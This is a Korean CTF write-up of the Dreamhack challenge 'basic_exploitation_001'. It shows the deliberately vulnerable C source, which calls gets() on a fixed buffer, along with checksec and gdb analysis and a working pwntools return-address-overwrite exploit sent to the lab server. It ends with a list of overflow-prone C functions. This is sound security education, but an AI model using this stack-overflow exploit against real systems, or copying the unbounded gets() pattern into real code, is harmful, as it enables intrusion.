[Dreamhack] Level1: basic_exploitation_001

🛎️ Access

이 문제는 서버에서 작동하고 있는 서비스(basic_exploitation_001)의 바이너리와 소스 코드가 주어집니다.
프로그램의 취약점을 찾고 익스플로잇해 “flag” 파일을 읽으세요.
“flag” 파일의 내용을 워게임 사이트에 인증하면 점수를 획득할 수 있습니다. 플래그의 형식은 DH{…} 입니다.

 

 

 

👾 Exploit Algorithm & Payload

#basic_exploitation_001.c

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}


void read_flag() {
    system("cat /flag");
}

int main(int argc, char *argv[]) {

    char buf[0x80];

    initialize();
    
    gets(buf);

    return 0;
}

 #Environment

Ubuntu 16.04
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)

 

 

#1

---

$ checksec --file basic_exploitation_001
$ readelf -h basic_exploitation_001

: 보호 기법과, ELF 포맷을 분석하기 위해 다음과 같은 코드를 사용한다.

: 유사 wargame인 'basic_exploitation_000' 과 다른 점은 nx bit가 존재한다는 점이다.

(-> shellcode 삽입 불가)

(32bit 리틀엔디언, relro 없음, 카나리 없음, pie 없음)

 

 

#2

---

 : 스택의 기본 메모리 구조에서 32bit에서는 Buffer + SFP[4byte] + RET[4byte]이다.

: buf[0x80] (128byte)만큼 주소가 할당되는데 여기서 gets함수로 buf 배열에 입력을 저장함을 알 수 있다.

(128byte+4byte=132byte후에 RET주소)

: 하지만 gets는 입력 값에 대한 제한이 없기 때문에 BOF(Buffer OverFlow)취약점이 발생한다는 것을 파악할 수 있다.

 

'a' 131번 입력

'a' 131번 입력 결과 ret의 주소

'a' 132번 입력 (core dump)

'a' 132번 입력 결과 ret의 주소 변화

$ gdb basic_exploitation_001
pwndbg> info func
pwndbg> print read_flag 
#$1 = {<text variable, no debug info>} 0x80485b9 <read_flag>

pwndbg> disassemble main
# 0x080485db <+15>: call 0x80483d0 <gets@plt>
# 0x080485e0 <+20>: add esp,0x4
# ...
# 0x080485e9 <+29>: ret


pwndbg> b *main+20
Breakpoint 1 at 0x80485e0


pwndbg> b *main+29
Breakpoint 2 at 0x80485e9


pwndbg> r aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
#'a' 131


pwndbg> c
Continuing.
# ni , finish, ...

pwndbg> r aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
# 'a' 132
# ni , finish, ...

: 이렇듯 gdb 디버깅을 통해서도 BOF 취약점을 메모리로 분석할 수 있다.

 

 

🔑Analysis and results for obtaining the Flag DH{…}

---

from pwn import *

r = remote("host3.dreamhack.games", 19695)

read_flag = 0x80485b9

payload = b"\x61"*132
payload += p32(read_flag)

r.sendline(payload)
r.interactive()

: 코드에서는 read_flag 함수를 호출하지 않지만 있는 것을 알 수 있었기에 read_flag의 주소를 알아낸 후, 리턴주소(RET)에 read_flag 주소로 변경하게 되면 값을 확인할 수 있다.

(pwndbg> print read_flag #$1 = {<text variable, no debug info>} 0x80485b9 <read_flag>)

: python pwd를 이용하여 플래그를 확득할 수 있다.

 

 

 

📌 Summary

---

BOF는 버퍼가 넘칠 수 있는 코드를 특히 주의해야한다.

 

| BOF에 취약한 함수 |

: 처리하는 문자열의 최대 크기를 정하지 않는 함수

 

• strcpy

• strcat

• gets

• fscanf

• sprintf

• vfscanf

• vsprintf

• vscanf

• vsscanf

• streadd

• streadd

• strecpy

• strtms